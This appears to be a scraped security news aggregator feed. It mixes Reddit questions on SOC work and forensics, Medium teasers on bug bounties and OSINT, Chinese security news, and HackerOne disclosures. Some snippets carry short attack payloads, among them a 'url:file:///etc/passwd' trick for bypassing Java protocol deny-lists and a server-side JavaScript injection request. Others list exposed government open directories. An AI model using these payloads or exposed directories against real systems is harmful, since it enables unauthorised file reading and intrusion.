    Hi all, This video covers what the essential mindsets are to be an effective SOC analyst. It covers WHAT the mindsets are, WHY they are relevant to a SOC analyst, and HOW these mindsets can be developed. This is far more important than technical skills which can be taught. So, if you are a ‘new’ or aspiring analyst, or an experienced senior analyst, or even if you are on the periphery of cyber security in IT or are just curious, this video will have something for you. Happy Cybering! https://youtu.be/HOFfYUd7DbE submitted by /u/SyPy [link] [comments]
    how to deal with phishing email in a big company?
    I'm a new graduate and I had a job interview for a soc analyst position, one of the question that kinda confused me is "how do you identify and deal with phishing emails?". First I answered with the basic clues: weird email address; unknown domain; bad grammar/spelling; no asking for sensitive data; no shady urls/files and use plugins to analyse the emails. But they told me what if the email seems perfect, like a gmail domain, good spelling and formatting and no urls or files attached. In my mind I'm thinking so how is this a phishing email if there is nothing suspicious in it. But I still tried to answer saying that you can teach your employees to be aware of such emails and to report them to the security team in case they find a suspicious email.They answered what if they company has thousands of employees, how is the security team gonna deal with potential hundreds of emails from the employees. At this point I got nothing else to say, what am I supposed to answer in this situation? thanks. submitted by /u/Dalleuh [link] [comments]
    Third party library license risk with Single Page Applications
    Many open source licenses have different rules depending on if the library is used with a SaaS product or an Externally deployed product. Does using an open source library within a Single Page Application architect mean the library is now deployed to the users browser and thus is externally deployed? submitted by /u/jrminty [link] [comments]
    Struggling to learn networks,can i learn it through programming and GNS3?
    Hi,so on my last infosec interview the guy told me to study more networks,and he suggested studying the content of Network+ . I am trying to learn from Mike Myers ‘s course but struggling badly. There are a lot of theories here and i keep missing a lot of points . So i want to learn it more practically and in parallel learn the theories. I am good with programming and i have GNS3. So my question,can i learn networking and network+ content through network programming and gns3 ? submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Google Dork nedir ve nasil kullanılır?
    OSINT teknikleri Continue reading on Medium »
  • Open

    The (Mis)Use of Artifact Categories
    Very often in DFIR, we categorize artifacts in an easy-to-understand and easy-to-digest manner, as using or relying on these categories often helps us navigate our investigations. There are also times when we reduce those artifacts to a level where they're easier to understand, and in doing so, the categorization of the artifact isn't quite accurate. As such, it's necessary now and again to go back and take a look at that categorization to determine if still holds, or if it truly served the community in the manner intended. SPOILER ALERT - TL:DR  Within the DFIR community, we should not be hanging investigation findings on single artifacts in isolation. If there are gaps in data, they need to be recognized, understood and communicated. Do not spackle those gaps over with guesswork and assu…
  • Open

    Breaking Google’s ReCaptcha v2 using.. Google.. Again
    submitted by /u/n0llbyte [link] [comments]
    Rouge RDP: New Initial Access Technique via RDP Bypassing Clients/Servers/Security Vendors
    submitted by /u/ustayready [link] [comments]
    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Phishing
    In the digital world everyone using smart device for day to day activity. We’re sharing many information, at the same time receiving many… Continue reading on Medium »
    BYPASS AMSI
    Cocinando nuestra receta con powershell y c# Continue reading on Medium »
  • Open

    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password.
    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password. submitted by /u/rvndomus3r2019 [link] [comments]
    Is there a way to find out whether the timestamp on a file has been modified?
    I knows it's very easy to modify "Date created" "Date Modified" attribute of a file. Is there any way to know if thee timestamps had been modified? Can I look at list of dates modified? Any logs or tools? Before someone suggests it back up wont help because the last VSS available is before the file was initially created. The file was created within the last 14 days, I have reason to believe that the date has been modified. ​ I'd really appreciate the help. submitted by /u/Serious_Mongoose_522 [link] [comments]
    Let's Talk About NTFS Index Attributes
    Good morning, It’s time for a new 13Cubed episode! Let’s revisit a critical NTFS artifact: NTFS Index Attributes (also referred to as $I30 files). We'll cover all of the information you need to know, and take a look at a new tool called INDXRipper. Episode: https://www.youtube.com/watch?v=x-M-wyq3BXA Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    microscopic aquatic animals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Files from Cleveland State Community Collage
    http://www.clevelandstatecc.edu/content/ submitted by /u/depressedclassical [link] [comments]
    1980s and early 1990s software
    http://cd.textfiles.com/dfeno1/ submitted by /u/depressedclassical [link] [comments]
  • Open

    AlbusSec:- Penetration-List 04 File Inclusion
    Hello Members, I hope that you liked Penetration-List Project, Therefore, I worked hard to complete Penetration-list Project. Firstly, I… Continue reading on Medium »
    My Pentest Log -8-
    Greetings from Caenopolis to all, Continue reading on Medium »
    Jax.Network weekly update
    by Maryna Trifonova, Head of Content at Jax.Network Continue reading on Jax.Network Blog »
    How anyone could have gotten a free pass to attended @IWCON2022
    Recently I attended InfoSec Community (@InfoSecComm) ‘s security conference IWCON2022. Awesome conference and awesome experience attending… Continue reading on Medium »
    NMAP commands
    Basic Scan on a Single IP: Continue reading on Medium »
    Everything you need to know about Bug Bounties
    What are Bug Bounty Programs Continue reading on Medium »
  • Open

    SecWiki News 2022-02-28 Review
    SecWiki周刊(第417期) by ourren 以PoC迁移促进漏洞评估 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-28 Review
    SecWiki周刊(第417期) by ourren 以PoC迁移促进漏洞评估 by ourren 更多最新文章,请访问SecWiki
  • Open

    URL: prefix를 이용하여 Deny-list 기반 Protocol 검증 우회하기
    phithon_xg가 재미있는 트릭을 트윗에 공개했는데, 실제로 분석애서 유용하게 쓰일 수 있어 간단하게 정리해서 글로 공유드려봅니다. Bypass protocol check in Java 아래 url: 접두사가 있는 URL들은 Java URL에서 각각 http://, file:// 과 동일하게 동작합니다. 1 2 url:http://127.0.0.1:8080 url:file:///etc/passwd 그래서 만약에 deny-list 기반으로 프로토콜을 검증하고 있는 경우, 이러한 url 접두사를 통해 우회할 수 있는 포인트가 됩니다. 1 2 3 4 5 6 7 // check() 함수가 file://로 시작하는 url을 차단하는 함수라고 가정하고, // 만약 inputURL에 url:file:///sdcard/blahblah.
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability
    Article URL: https://www.ipcc.ch/report/ar6/wg2/ Comments URL: https://news.ycombinator.com/item?id=30500104 Points: 2 # Comments: 0
  • Open

    Stack-based Buffer Overflow Series (aimed at beginners)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    微众银行应用安全团队招聘 | 深圳
    微众银行应用安全团队招聘应用安全岗
    乌克兰招募 "IT军 ",俄罗斯 31 实体成为攻击目标
    乌克兰意图组建一支志愿 &amp;amp;amp;quot;IT军队&amp;amp;amp;quot;,对俄罗斯进行网络攻击。
    FreeBuf早报 | Meta封锁俄在乌的官媒体账户;伊朗黑客组织使用新型恶意软件攻击
    乌克兰正在招募一支由白帽黑客组成的志愿IT军队,以对一系列俄罗斯实体发起攻击。
    通配符SSL证书的好处及选购方法
    很多网站因为业务需要,在同一个主域名下通常会有多个子域名。在这种情况下申请SSL证书就要很慎重,既要考虑到网站安全需要,又要考虑经济实惠,首选肯
    光大银行安全处招聘简章
    招聘安全工程师、安全运营、安全管理等岗位。
    安徽省委统战部副部长张启明带队调研全息网御合肥研发基地
    近日,安徽省统战部副部长张启明带队调研全息网御合肥研发基地,着重听取了全息网御自主创新的核心技术,聚焦数据安全的产业定位与合纵连横的生态合作应用场景,并就科技型企业的未来发展进行深入交流。他指出
    GPU巨头英伟达遭“​毁灭性”网络攻击、头号恶意软件关闭其僵尸网络基础设施|2月28日全球网络安全热点
    被称为TrickBot的模块化Windows犯罪软件平台于周四正式关闭其基础设施,此前有报道称其在近两个月的活动停滞期间即将退休。
    欧盟正式公布《数据法案》、乌克兰再遭DDoS攻击、厨具巨头美亚遭攻击内部数据泄露|网络安全周报
    2月23日,欧盟委员会公布了名为《数据法案》(Data Act)的提案,旨在帮助小公司在竞争中赶上大公司,从智能家电到汽车等联网产品产生的非个人数据中获利。
    Portswigger 文件上传系列 File Upload详细笔记
    其实也算是很早就听说了文件上传漏洞,并在一些CTF比赛中做了一些题目,再刷一遍port的吧。
    匿名者组织入侵白俄罗斯铁路内部网络
    匿名者组织入侵白俄网络,并影响起铁路运营。
    英伟达遭遇网络攻击,1TB数据被盗
    攻击影响了公司的开发人员工具和电子邮件系统,并窃取了包括员工在线凭证在内的1TB数据。
    2021年未修补漏洞利用为勒索软件攻击依赖主要切入点
    未修补软件的漏洞利用导致的攻击增加了33%,这是2021年勒索软件攻击者进行攻击最依赖的切入点,在勒索软件攻击原因中占44%。
  • Open

    Invicti Security Adds Software Composition Analysis to Its Industry- Leading AppSec Platform
    With headline-grabbing vulnerabilities such as Log4Shell drawing attention to the risks presented by open-source components, organizations increasingly need application security programs that address this risk. READ MORE
    DAST, IAST, SCA: Deeper coverage in a single scan
    With Invicti SCA as part of your application security program, you can track and secure open-source components for deeper coverage in one single scan. READ MORE
  • Open

    File Transfer Filter Bypass: Exe2Hex
    Introduction Exe2hex is a tool developed by g0tmilk which can be found here. The tool transcribes EXE into a series of hexadecimal strings which can The post File Transfer Filter Bypass: Exe2Hex appeared first on Hacking Articles.
    File Transfer Filter Bypass: Exe2Hex
    Introduction Exe2hex is a tool developed by g0tmilk which can be found here. The tool transcribes EXE into a series of hexadecimal strings which can The post File Transfer Filter Bypass: Exe2Hex appeared first on Hacking Articles.
    Windows Persistence: Shortcut Modification (T1547)
    Introduction According to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
    Windows Persistence: Shortcut Modification (T1547)
    Introduction According to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
  • Open

    Argo Security Automation with OSS-Fuzz
    Continuous Fuzzing Integration in Argo Continue reading on Argo Project »
  • Open

    Argo Security Automation with OSS-Fuzz
    Continuous Fuzzing Integration in Argo Continue reading on Argo Project »

  • Open

    Fotoğraflardaki metin nasıl kopyalanır?
    Açık kaynak istihbaratı’te kullanılan teknikler Continue reading on Medium »
    I hate Marinas, It’s too Crowded —OSINT Challenge 21 and 22
    While I was reading some Medium blogs, I came across @Sofia Santos’s blogs (this writeup specifically: Walkthrough — Hacktoria… Continue reading on Medium »
    Gölgene dikkat et: fotoğraftaki gölgelerden fotoğrafın ne zaman çekildiğini nasıl anlarız?
    Açık kaynak istihbaratı’te kullanılan teknikler Continue reading on Medium »
    The Current State of the Cyber War Between Russia and Ukraine — An OSINT Analysis
    Go through the following OSINT analysis courtesy of Dancho Danchev on the current state of the cyber war between Russia and Ukraine. Enjoy! Continue reading on Medium »
  • Open

    Large Amount of IPs coming from Europe
    Hi, Little background info first. I'm a beginner Networking & Security student so I'm not that unfamiliar with stuff, I don't have anything hosted other than a VPN, and I'm using a consumer grade router that's not capable of VLANs, and other good stuff. I may be just a little paranoid but I've been noticing a lot of blocked IP requests from Russia in the security log for my router. Almost 50% of what I found in the log for February 27 is from over there. One of the IPs I found had 32 hits, another had just 9. Coming in second is the US, then there's Switzerland, Germany, Lithuania. From just the couple foreign IPs that I looked up using https://www.abuseipdb.com/, all of them were flagged for high confidence of abuse. I don't have anything against those countries but I was wondering what all that's going on if I should be more concerned than usual. I'd just like my computer and data to remain in once piece. Not sure if I should be saying anything else about my setup on a public post here but could appreciate some advice. Only tech guy in my family so can't ask anyone else. I'm considering just disabling the VPN so I don't have any more open ports, and using iCloud Private Relay or something else when I'm out. I'm aware of Pfsense, and I was considering it, but I just don't want to spend $$$ with inflation, chip shortages, and who knows what else. Anyway thanks in advance. submitted by /u/Expensive-Exit6398 [link] [comments]
    How does cross-browser checking work?
    I am not familiar with technology. But this kinda freaked me out. https://fingerprintjs.com/blog/external-protocol-flooding/ Following the article, I went ahead and did this test, https://schemeflood.com/ I recently installed fedora on my desktop but it showed all the apps I installed on window previously. (it's not a dual boot) Did I mess something up when installing? or is it a vulnerability? submitted by /u/manho1e [link] [comments]
    What are your methods for investigating JA3 & JA3S IOC hits?
    What sites do you use to validate information? Even if the certificate is valid, how are ensuring it’s for that proper site? What if the certificate says self-signed or expired? submitted by /u/pass-the-word [link] [comments]
  • Open

    Qualsys Vulnerability Detection Pipeline
    Article URL: https://qualys-secure.force.com/discussions/s/ Comments URL: https://news.ycombinator.com/item?id=30492601 Points: 2 # Comments: 0
  • Open

    Various governments open directories
    https://www.mendoza.gov.ar/wp-content/uploads/ https://www.mrt.tas.gov.au/mrtdoc/ https://hret.gov.ph/admin.hret.gov.ph/ https://tuguegaraocity.gov.ph/public/ https://tuguegaraocity.gov.ph/admin/ (sometimes throws a PHP error for some reason) https://web.yme.gov.gr/data/ https://geoftp.ibge.gov.br/ http://www.pmf.sc.gov.br/arquivos/arquivos/ http://maps.six.nsw.gov.au/csv/ http://globe.six.nsw.gov.au/csv/ https://irs.os.gov.ng/wp-content/uploads/ https://online.agriculture.gov.au/static/department/ http://itaperuna.rj.gov.br/planoDiretorArquivos/ https://www.czj.sh.gov.cn/zss/ http://www.mto.gov.on.ca/documents/ https://tnlandsurvey.tn.gov.in/assets2/correlation/ (/assets2/ returns 403, /assets/ returns phpinfo()) https://info.saude.df.gov.br/wp-content/uploads/ http://www…
    A full Google Drive as an archive related to my time in Psychic Tv in the ‘90s. Music, photos, multimedia. And current projects.
    submitted by /u/inoculatemedia [link] [comments]
    Movies, shows and 'more'
    http://51.77.66.14/ some good NSFW stuff in sarasa folder submitted by /u/LucasImages [link] [comments]
  • Open

    Brian Rea (DeviantOllum Deviant) and Lesley Carhart (Hacks4Pancakes) continue their harassment of me
    Please notice I left these people alone for a long period of time and then they start harassing me. Seriously search for when I've mentioned them here last. The line I crossed with her, I blocked her mostly because she pushed some silly stuff that ended my con.
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    All about Account Takeover
    Account Takeover Methods Continue reading on InfoSec Write-ups »
    StaFi and Immunefi Partner to Launch A Bug Bounty For rDex Testnet
    Introduction Continue reading on Medium »
    Finding EXIF Geo-location of images
    Let us learn about finding EXIF Geo-Location of images Continue reading on Medium »
    Methods to Bypass two factor Authentication
    There are multiple ways to bypass two factor authentication . some of these way is here . Continue reading on Medium »
    BUG BOUNTY CHECK LIST BY C1
    C1h2e1 Continue reading on Medium »
    Easy Windows 0 day UAC Bypass!
    Hey guys! I am harish, I used to find vulnerabilities on the Microsoft bug bounty program and Google VRP! Continue reading on Medium »
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    We Put A C2 In Your Notetaking App: OffensiveNotion
    A Red Teaming Science Fair Project Continue reading on Medium »
  • Open

    Special 50% Discount for My 100GB "Cybercrime Forum Data Set for 2022" Today! Grab a Copy Today!
    Dear blog readers,Who wants to obtain direct download access to my 100GB "Cybercrime Forum Data Set for 2022" with a 50% discount which I'm offering only today for research data mining and enrichment purposes?Drop me a line at dancho.danchev@hush.comSample photos of the actual content: Stay tuned!
    Courtesy of Republic of Bulgaria!
    This is me! And this is me! On the run. Awesome!Cool! Awesome! More cool stuff! Even more cool stuff! Including this! Including this!This is cool!Even more cool! - check out the Illegal Restraint section! Awesome!Quote: "The Mentally Ill or Disabled"With few exceptions, material conditions in psychiatric hospitals and social care institutions for children and adults with developmental
    Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Four
    Dear blog readers,Continuing the "Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Three" blog posts series I've decided to share yet another currently active portfolio of ransomware themed email address accounts currently involved in a variety of campaigns.Sample ransomware-themed personal email address accounts known to
    The Cyber War Between Russia and Ukraine - An OSINT Analysis
    Dear blog readers,I've decided to take a deeper look inside the currently ongoing cyber war between Russia and Ukraine and I've decided to provide actionable intelligence on the online whereabouts and actual campaign infrastructure behind the currently ongoing campaigns which appear to be several crowd-sourced campaigns which I profiled including various other modest engagement "touch points"
  • Open

    SecWiki News 2022-02-27 Review
    自定义AWVS的Docker镜像 by sinver 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-27 Review
    自定义AWVS的Docker镜像 by sinver 更多最新文章,请访问SecWiki
  • Open

    Sequential Import Chaining을 이용한 CSS 기반 데이터 탈취
    오늘은 CSS 기반의 공격 기법인 Sequential Import Chaining에 대해 이야기하려고 합니다. 자체적으로 뭔가 영향력이 있는건 아니지만, CSS를 제어할 수 있을 때 영향력을 증폭시켜줄 수 있는 방법이니 꼭 알아두고, 유용하게 사용하시길 바래요 😊 Sequential Import Chaining Sequential Import Chaining은 d0nutptr이 제시한 공격 기법으로 CSS Injection이나 RPO(Relative Path Overwrite) 시 영향을 올리기 위한 Exploit 방법 중 하나입니다. 이 방법은 CSS의 Attribute Selectors란 기능, 즉 DOM Object의 value 값에 따라서 스타일을 지정할 수 있도록 제공하는 기능을 이용한 방법인데요.
  • Open

    Circumventing Deep Packet Inspection with Socat and rot13
    submitted by /u/jrj334 [link] [comments]
    ZDI-CAN-12671: Windows Kernel DoS/Privilege Escalation via a NULL Pointer Deref
    submitted by /u/yuhong [link] [comments]

  • Open

    Intigriti’s February XSS challenge By aszx87410
    February’s XSS challenge is here! On the surface the challenge seems simple but it actually gives light upon two very interesting topics … Continue reading on Medium »
    From zero to hero – XSS
    This article is about what you need to know about Cross-Site-Scripting(AKA. XSS). Continue reading on Medium »
  • Open

    Server-Side Javascript Injection (SSJI)
    🔍 Introduction SSJI(Server Side Javascript Injection)는 서버가 자체적으로 Javascript를 처리하는 엔진을 가지거나, 백엔드에서 Headless browser 등을 통해 처리하는 로직이 있는 경우 공격자가 이를 제어하여 서버사이드에서 원하는 Javascirpt를 실행하도록 하는 공격입니다. 🗡 Offensive techniques Detect eval(), setTimeout(), setInterval() 등의 JS 함수를 포함한 요청을 전달하여 서버 사이드에서 이를 처리하는지 식별하면 됩니다. 가장 간단한 방법으론 setTimeout과 setInterval을 이용한 딜레이 체크입니다. Request 1 GET /import?unloadcode=setTimeout(a%3d1,%205000) HTTP/1.1 Response 1 2 3 HTTP/1.
    Relative Path Overwrite (RPO)
    🔍 Introduction RPO(Relative Path Overwrite)는 relative URL, 즉 상대 경로 기반의 URL을 덮어써서 의도하지 않은 동작을 수행하는 공격 방법입니다. Relative Path Confusion이라고도 불리며 본 문서에서는 RPO로 통일하여 작성하곘습니다. RPO를 웹에서 이야기할 땐 보통 시스템에서 사용하는 Relative Path(e.g ../../app)와 Absolute Path(e.g /app) 과 약간 다른점이 있으니 참고하시길 바래요. Path Description Example Absolute URL Host가 포함된 URL Relative URL Host가 포함되지 않은 URL <src="/file.
  • Open

    How to geolocate a Twitter video using free OSINT tools
    And how relying on information from the news can set you back. Continue reading on Medium »
    Open Source Intelligence — OSINT
    Open Source Continue reading on Medium »
  • Open

    Fuzzing Network Servers with De-Socketing
    submitted by /u/martinclauss [link] [comments]
    The Ransomware Files podcast: In 2019, 23 cities in Texas were infected with the REvil ransomware in a huge attack. The cities recovered quickly but a MSP, whose ScreenConnect software was exploited, was irreparably damaged. It's a heartbreaking story that reveals the human cost of ransomware.
    submitted by /u/ferrochron1 [link] [comments]
  • Open

    Zulip Cloud security vulnerability with reusable invitation links
    Article URL: https://blog.zulip.com/2022/02/25/zulip-cloud-invitation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30479430 Points: 81 # Comments: 29
  • Open

    SecWiki News 2022-02-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-26 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Give Me Some (macOS) Context…
    This blog post will dive into what I like to call “execution contexts” on macOS and why it is important to understand these different… Continue reading on Medium »
  • Open

    Wget security questions
    Is there any security concerns with using wget? Is there anything I should be aware of to stay relatively safe? submitted by /u/fenriswolf_411 [link] [comments]
    This sub is being mentioned on Ukraine related subs.
    There are talks requesting that videos, images, etc be archived from r/Ukraine just in case information starts disappearing. Not sure if you guys do that sort of thing but having seen this sub mentioned I figured Id bring it up here. submitted by /u/Tripartist1 [link] [comments]
    The official SteamOS repo, including ISOs of internal versions.
    submitted by /u/wertercatt [link] [comments]
  • Open

    Examining a Windows LTSC system
    How much more difficult is it to gather evidence from a Windows operating system that is the LTSC version when compared with a regular Windows system? I know LTSC is supposed to be much more privacy friendly and disables telemetry so just though I would ask out of curiosity. submitted by /u/xnospax [link] [comments]
  • Open

    Kali Linux: Top 5 tools for information gathering
    What is information gathering? Continue reading on Medium »
    Meu primeiro bug em apenas 5 minutos
    Olá hacker, hoje vou contar sobre como encontrei meu primeiro bug (vulnerabilidade)em apenas 5 minutos Continue reading on Medium »
    SSRF & LFI In Uploads Feature
    Hello fellow hackers, today I will discuss how I found a Server-Side Request Forgery (SSRF) which lead to a Local File Inclusion (LFI)… Continue reading on Medium »
  • Open

    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Bypass Email Verification in Customer Portal
    Mattermost disclosed a bug submitted by odx09: https://hackerone.com/reports/1443211 - Bounty: $150
  • Open

    Android App Pentest
    Just got into Android App pentest The app has a functionality to purchase courses So what can be the best way to bypass it Intercepting it through burp and try some manipulation as we do in Web apps Or some Reverse Engineering Stuff will work here ( Which I don't think makes sense ) If anybody has any experience Pentesting apps with similar functionalities Your Help is appreciated!! submitted by /u/Chirag_Offsec22 [link] [comments]
    Moving Into cyber security!
    Switching careers into security Hey everyone! So fairly new to the IT world, as title says I’m switching careers from being an executive chef for the past 16 years into cyber security. I’m starting a 6 month boot camp soon with GSU and afterwards I’ll get my sec+. I’ve been doing a lot of my own research by reading as much as I can, being active in a lot of different forums and have already put 50+ hours on tryhackme (which has been awesome) and putting a lot of work into my home network! The goal is to try and get into a SOC position or something similar and skip the help desk, I’m hoping some of the leadership, team building and communication skills i learned being a chef can help me land these roles. Is there anything I can be doing in the meantime to further help myself? How does this plan sound? Any advice is super helpful!! submitted by /u/Immediate-Ad-8996 [link] [comments]
    I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, any idea what is going on here?
    TL;DR I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, I want to know more and don't know what to do. For some time now, I've been building a cryptocurrency trading bot, but I've left it aside for some time now, letting it collect data while I do other stuff. It will be there when I get back to it. Now that I am thinking of getting back to it, I decide to check in. So, I SSH into my home server, connect to the screen instance, and realize that I'm getting frequent (~1/min) POST requests from some IPs I don't recognize. Now, the only HTTP requests this app is supposed to make are GET requests to the exchange (Kraken) every 5 minutes, so something strange is going on here. In the console, I see multiple lines that l…
  • Open

    开源远程服务器管理工具箱:UltimateShell
    为渗透测试工程师、程序员、网站管理员、IT 管理员以及几乎所有需要以更简单的方式处理远程工作的用户提供大量定制功能。
  • Open

    Dancho Danchev's Sample Personal Conference and Event Photos - A Compilation
    Dear blog readers,I've decided to share with everyone a set of personal conference and event photos.Enjoy!
  • Open

    Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot
    An attack in early February targeted an energy organization in Ukraine with OutSteel and SaintBot. The attack is part of a larger campaign. The post Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot appeared first on Unit42.

  • Open

    Russian-manufactured armored vehicle vulnerability in urban combat (1997)
    Article URL: https://man.fas.org/dod-101/sys/land/row/rusav.htm Comments URL: https://news.ycombinator.com/item?id=30473688 Points: 52 # Comments: 49
    OpenVAS – Open Vulnerability Assessment Scanner
    Article URL: https://openvas.org/ Comments URL: https://news.ycombinator.com/item?id=30469493 Points: 1 # Comments: 0
    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.org/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30468679 Points: 2 # Comments: 0
    CISA: Zabbix servers under attack with recently disclosed vulnerability
    Article URL: https://therecord.media/cisa-zabbix-servers-under-attack-with-recently-disclosed-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30466266 Points: 5 # Comments: 0
  • Open

    Bug Bounty: My Work Schedule
    According to the 2020 H1 report: Continue reading on Medium »
    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    Booked your tickets for IWCON2022 yet? Continue reading on InfoSec Write-ups »
    Authentication Bypass in Admin Panel
    This is my second write-up about finding a bug in admin panel and how i escalated the severity from Low to critical Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CSRF (CROSS SITE REQUEST FORGERY) LAB ÇÖZÜMLERİ
    CSRF (Siteler Arası İstek Sahteciliği), kimliği doğrulanmış kullanıcının web sayfasında istenmeyen faaliyetler gerçekleştirmesine olanak… Continue reading on Medium »
    B̶a̶k̶e̶ Hack your cake!
    “If you can’t bake a cake then hack the entire cake shop” — Vivek Coelho Continue reading on InfoSec Write-ups »
    10 ways to get RCE From LFI
    this illustrates multiple ways to upgrade your LFI to RCE Continue reading on Medium »
    Golden/Silver Ticket Attack | Kerberos | Active Directory |
    In this blog, we are going to talk about golden and silver ticket attacks. Continue reading on Medium »
    A Weird Price Tampering Vulnerability
    Well, Hello Pirates!!!!!!!!!!!!!!!!!!!!!!!!! Long Time No See :D Continue reading on Medium »
    Give me a browser, I’ll give you a Shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »
    Bypassing default visibility for newly-added email in Facebook(Part II - Trusted Contacts)
    After 3 months, I manage to bypassed again the default visibility for newly-added email in Facebook. Here is the link of my first write-up… Continue reading on Medium »
  • Open

    Razzlekahn Part 1: Establishing Some Background.
    If you haven’t seen my introduction to this case, please take few minutes and check out Untangling the Razzlekahn Conspiracy: An OSINT… Continue reading on Medium »
    Untangling the Razzlekahn Conspiracy: An OSINT Perspective.
    Six years ago, 200,000 Bitcoin were stolen from the Bintfinex exchange. the coins remained largely untouched until 2017 when some of the… Continue reading on Medium »
    How to Set Up MISP (Malware Information Sharing Platform)
    MISP (Malware Information Sharing Platform) is a free, open source threat intelligence platform that can store, correlate, and share IoCs… Continue reading on Medium »
    Mosint
    What is mosint ? Continue reading on Medium »
  • Open

    How to Decrypt the Files Encrypted by the Hive Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Pentest-tool: Simple and secure web deployment for pentest and redteam with simwigo
    submitted by /u/B1che [link] [comments]
    BGP Security in 2021
    submitted by /u/danyork [link] [comments]
    Catching bugs in VMware: Carbon Black Cloud Workload Appliance and vRealize Operations Manager
    submitted by /u/scopedsecurity [link] [comments]
  • Open

    [AWC-Pune] - User can download files deleted by Admin using shortcuts
    Lark Technologies disclosed a bug submitted by prateek_thakare: https://hackerone.com/reports/1463028 - Bounty: $550
    [Android] Directory traversal leading to disclosure of auth tokens
    Slack disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1378889 - Bounty: $3500
    Hackerone open redirect security alert bypass via view report as PDF
    HackerOne disclosed a bug submitted by iamr0000t: https://hackerone.com/reports/1386277 - Bounty: $500
  • Open

    Readteam-tool: Simple and secure web deployment for pentest and redteam with simwigo
    Simwigo is a cross-plateform tool, written in Go, that allows you to quickly deploy a secure web service (with a nice and neat display:)). It was created to replace the use of tools such as SimpleHTTPServer and http.server from python. It implements additional features allowing easy file exchange. It can be used for a pentest or a redteam, as well as for personal use. An API token authentication, a white list system, and the use of TLS (automatic deployment via Let's Encrypt) are integrated and increase the security of the service. Check out the latest release: https://github.com/8iche/simwigo/ submitted by /u/B1che [link] [comments]
  • Open

    【安全通报】Clash For Windows 远程代码执行漏洞
    近日,Github上曝光了Clash For Windows开源代理工具的远程代码执行漏洞。据了解该漏洞利用细节及漏洞利用代码已在网络上公开,其可能已被在野利用。
  • Open

    【安全通报】Clash For Windows 远程代码执行漏洞
    近日,Github上曝光了Clash For Windows开源代理工具的远程代码执行漏洞。据了解该漏洞利用细节及漏洞利用代码已在网络上公开,其可能已被在野利用。
  • Open

    Pentesting suite for Android suggestions
    Hey everyone, I am looking for a pentesting suite/app for Android, something similiar to what cSploit and zANTI were back in 2014 - 2016, a quick solution to check for most of the basic vulnerabilities. I am aware of Kali NetHunter but, I would like something closer to an app, than a whole other operating system. Is anything like this still out there? I have been out of the Android community for the past 6 or so years. submitted by /u/ivaks1 [link] [comments]
    Does anyone think directory traversal/arbitrary file read is a super powerful vuln type?
    Lets just look at all the obvious uses for it: - auth bypassing/authorization bypassing - useful in rce chains Now let me explain why its a powerful vuln class say you find one on the login page of a website you now have pre auth file read and for example could steal cached session cookies of an admin or crack a hash stored somewhere. This lets you escalate from a guest user all the way to super admin. Now lets say they patch this in a lot of cases you can password spray a random user and find a post auth file read and now instead of an auth bypass its more of an authorization bypass now your a normal user but can read admin areas and admin log files that may have juicy stuff. Ive ran into this scenario many times where they’ll patch a pre auth one but a post auth one quickly gets found. Definitely one of my favorite vulns out there. submitted by /u/Academic-Discount252 [link] [comments]
    Is there any interesting flaws or attacks against SFU’s or selective forwarding units? Would make for a novel bug bounty finding
    Most companies these days are moving towards SFU’s from p2p so it would be interesting to exploit low level sfu implementations for rce and maybe exploit the general logic of an sfu for ip disclosures etc. I haven’t seen like any research on SFU’s. One interesting idea is forcing other clients to connect to you by claiming your an SFU server not even sure if thats possible but would be interesting. submitted by /u/Academic-Discount252 [link] [comments]
    Reference for Snort/Suricata Flowbit Group Names
    I'm researching Snort "flowbit" group names (ex: http.dottedquadhost, userlogin, etc.). Yet, I cannot find any references that cover/explain the variety of group names that can be used. Does anyone know where I can find more information on how these group names are defined? submitted by /u/cyberphor [link] [comments]
    Is this worth it?
